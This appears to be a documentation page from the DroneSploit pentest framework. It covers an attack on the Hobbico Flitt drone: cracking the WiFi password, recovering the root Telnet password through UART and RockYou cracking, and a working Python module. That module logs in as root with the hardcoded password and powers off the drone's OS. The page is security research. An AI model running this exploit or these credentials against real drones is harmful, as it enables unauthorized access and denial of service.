Skip to content

Hobbico Flitt - Power Off

Security issues

This attack results from 3 security issues :

  • Default WiFi password.
  • A Telnet service is permanently running as root.
  • The root user has a too weak password.

Telnet password recovery

A WPA2-PSK classical guessing attack was achieved using the Aircrack-NG suite, leading to the discovery of the WiFi password.

An online dictionary attack was attempted using the RockYou list but was unrealistic because of the low battery (only a few hundreds attempts possible per uptime period).

So, an exposed UART interface was connected through a serial port to get a root shell directly on the hardware, therefore allowing to visit the OS and to grab hashes for cracking.

An offline dictionary attack using the RockYou wordlist allowed to recover the Telnet root password.

DroneSploit module

A proxy class was made to implement Flitt's default configuration options to give the FlittModule class (see dronesploit/lib/drones/hobbico.py). FlittTelnetModule inherits this with an additional method for sending Telnet commands, send_telnet_command(cmd).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
class FlittTelnetModule(FlittModule):
    """ Module proxy class holding the method for executing Telnet commands. """
    config = Config({
        Option(
            'PASSWORD',
            "Telnet password",
            True,
        ): "ev1324",
    })
    path = "exploit/hobbico/flitt"
    requirements = {'python': ["telnetlib"]}

    def send_telnet_command(self, cmd):
        from telnetlib import Telnet
        self.logger.debug("Starting a Telnet session...")
        t = Telnet(self.config.option("IP").value)
        self.logger.debug("[SRV] " + t.read_until(b"login: ").decode("utf-8"))
        self.logger.debug("[CLT] " + "root")
        t.write(b"root\n")
        self.logger.debug("[SRV] " + t.read_until(b"assword: ").decode("utf-8"))
        pswd = self.config.option("PASSWORD").value
        self.logger.debug("[CLT] " + pswd)
        t.write(pswd.encode("utf-8") + b"\n")
        resp = t.read_until(b"~ # ")
        self.logger.debug("[SRV] " + resp.decode("utf-8"))
        success = False
        if b"Welcome to HiLinux." in resp:
            self.logger.debug("[CLT] " + cmd)
            t.write(cmd.encode("utf-8") + b"\n")
            self.logger.success("Telnet command sent")
            success = True
            self.logger.debug("[CLT] exit")
            t.write(b"exit\n")
            t.read_all()
        else:
            self.logger.failure("Bad Telnet password")
        t.close()
        return success

The module is finally :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
class TelnetDos(FlittTelnetModule):
    """ Power off the target Flitt through Telnet.

    Author: Alexandre D'Hondt
    Email:  alexandre.dhondt@gmail.com

    Note that this will "power off" ToyBox, the OS on the drone, but this will
     not shutdown the drone completely.
    """
    def run(self):
        self.logger.info("Powering off the target...")
        self.send_telnet_command("poweroff -d 1")